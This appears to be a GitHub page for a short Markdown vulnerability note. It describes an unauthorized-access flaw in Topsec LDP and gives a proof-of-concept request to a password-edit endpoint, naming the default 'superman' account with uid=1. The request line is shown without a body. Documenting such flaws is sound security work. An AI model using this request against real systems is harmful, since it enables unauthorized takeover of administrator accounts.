Skip to content

Latest commit

 

History

History
21 lines (13 loc) · 256 Bytes

天融信LDP未授权访问漏洞.md

File metadata and controls

21 lines (13 loc) · 256 Bytes

天融信LDP未授权访问漏洞

漏洞描述

天融信LDP存在未授权访问漏洞

漏洞影响

Note

天融信LDP

漏洞复现

POC为

默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1